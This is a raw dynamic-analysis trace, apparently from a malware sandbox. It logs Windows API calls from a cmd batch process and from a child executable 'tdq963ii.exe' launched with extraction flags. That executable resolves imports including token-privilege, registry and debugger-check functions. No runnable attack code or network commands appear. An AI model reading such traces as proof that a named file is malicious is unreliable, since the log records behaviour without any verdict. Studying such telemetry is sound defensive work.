[0245.499] _get_osfhandle (_FileHandle=3) returned 0x74 [0245.499] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5449c0 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544890 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544768 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5446f0 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544668 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544450 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x554b40 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x554af8 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x530d18 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544388 | out: hHeap=0x530000) returned 1 [0245.499] GetProcessHeap () returned 0x530000 [0245.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x530d30 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544350 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5442f0 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x531290 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544290 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544230 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5441b8 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544160 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x543660 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x531240 | out: hHeap=0x530000) returned 1 [0245.500] GetProcessHeap () returned 0x530000 [0245.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5311c0 | out: hHeap=0x530000) returned 1 [0245.500] _get_osfhandle (_FileHandle=3) returned 0x74 [0245.501] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0245.501] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cf280, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cf280*=0x0, lpOverlapped=0x0) returned 1 [0245.501] GetLastError () returned 0x0 [0245.501] _get_osfhandle (_FileHandle=3) returned 0x74 [0245.501] GetFileType (hFile=0x74) returned 0x1 [0245.501] _get_osfhandle (_FileHandle=3) returned 0x74 [0245.501] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0245.501] GetProcessHeap () returned 0x530000 [0245.501] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x554af8 [0245.501] GetProcessHeap () returned 0x530000 [0245.501] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x554af8 | out: hHeap=0x530000) returned 1 [0245.502] _get_osfhandle (_FileHandle=3) returned 0x74 [0245.502] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0245.502] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cf264, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cf264*=0x0, lpOverlapped=0x0) returned 1 [0245.502] GetLastError () returned 0x0 [0245.502] _get_osfhandle (_FileHandle=3) returned 0x74 [0245.502] GetFileType (hFile=0x74) returned 0x1 [0245.502] _get_osfhandle (_FileHandle=3) returned 0x74 [0245.502] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0245.502] GetProcessHeap () returned 0x530000 [0245.502] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x554af8 [0245.502] GetProcessHeap () returned 0x530000 [0245.502] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x554af8 | out: hHeap=0x530000) returned 1 [0245.502] longjmp () [0245.502] _tell (_FileHandle=3) returned 226 [0245.502] _close (_FileHandle=3) returned 0 [0245.503] CmdBatNotification () returned 0x1 [0245.503] _get_osfhandle (_FileHandle=1) returned 0x7 [0245.503] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0245.503] _get_osfhandle (_FileHandle=1) returned 0x7 [0245.503] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0245.503] _get_osfhandle (_FileHandle=0) returned 0x3 [0245.503] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0245.504] SetConsoleInputExeNameW () returned 0x1 [0245.504] GetConsoleOutputCP () returned 0x1b5 [0245.504] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0245.504] SetThreadUILanguage (LangId=0x0) returned 0x409 [0245.504] exit (_Code=1) Process: id = "235" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x29634000" os_pid = "0x490" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "179" os_parent_pid = "0x74c" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 830 os_tid = 0x38c [0227.881] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0227.882] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0227.882] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0227.882] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0227.882] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0227.882] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0227.882] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0227.882] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0227.883] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0227.883] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0227.883] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0227.883] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0227.883] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0227.883] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0227.884] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0227.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0227.884] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0227.884] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0227.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0227.884] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0227.884] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0227.884] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0227.885] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0227.885] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0227.885] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0227.885] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0227.885] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0227.885] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0227.885] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0227.885] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0227.885] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0227.886] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0227.887] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0227.888] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0227.888] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0227.888] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0227.888] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0227.888] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0227.888] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0227.888] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0227.888] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0227.889] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0227.889] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0227.889] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0227.889] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0227.889] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0227.889] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0227.889] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0227.889] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0227.889] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0227.890] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0227.890] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0227.890] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0227.890] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0227.890] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0227.890] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0227.890] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0227.890] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0227.891] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0227.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0227.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0227.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0227.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0227.891] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0227.891] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0227.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0227.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0227.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0227.892] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0227.892] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0227.892] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0227.892] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0227.892] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0227.892] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0227.892] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0227.892] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0227.893] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0227.893] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0227.893] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0227.893] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0227.893] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0227.893] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0227.893] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0227.893] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0227.893] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0227.894] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0227.894] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0227.894] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0227.894] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0227.894] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0227.894] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0227.894] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0227.894] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0227.894] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0227.895] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0227.895] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0227.895] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0227.895] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0227.895] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0227.895] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0227.895] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0227.895] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0227.896] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0227.896] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0227.896] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0227.896] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0227.896] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0227.896] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0227.897] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0227.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x3f1876a0, dwHighDateTime=0x1d68287)) [0227.897] GetCurrentThreadId () returned 0x38c [0227.897] GetCurrentProcessId () returned 0x490 [0227.897] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=34823642631) returned 1 [0227.898] GetProcessHeap () returned 0x620000 [0227.898] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0227.898] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0227.898] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0227.930] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0227.930] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0227.931] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0227.932] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0227.933] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0227.933] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0227.933] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0227.933] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0227.933] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0227.933] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0227.933] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0227.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x637090 [0227.934] GetCurrentThreadId () returned 0x38c [0227.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x637458 [0227.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x637478 [0227.934] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x25686d88, hStdError=0x0)) [0227.934] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0227.934] GetFileType (hFile=0x3) returned 0x2 [0227.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0227.934] GetFileType (hFile=0x7) returned 0x2 [0227.935] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0227.935] GetFileType (hFile=0xb) returned 0x2 [0227.935] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0227.935] GetEnvironmentStringsW () returned 0x637c80* [0227.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb7e) returned 0x638808 [0227.936] FreeEnvironmentStringsW (penv=0x637c80) returned 1 [0227.936] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x94) returned 0x637c80 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa0) returned 0x637d20 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x634dc0 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6c) returned 0x637dc8 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6e) returned 0x637e40 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x78) returned 0x62f8f0 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x62) returned 0x637eb8 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x637f28 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x637f60 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x22) returned 0x637fb0 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x28) returned 0x637fe0 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x636a60 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4a) returned 0x638010 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x72) returned 0x62f970 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x638068 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x6380a0 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1c) returned 0x636a88 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xd2) returned 0x6380d8 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x7c) returned 0x6381b8 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x638240 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3a) returned 0x634e08 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x90) returned 0x638280 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x638318 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x638348 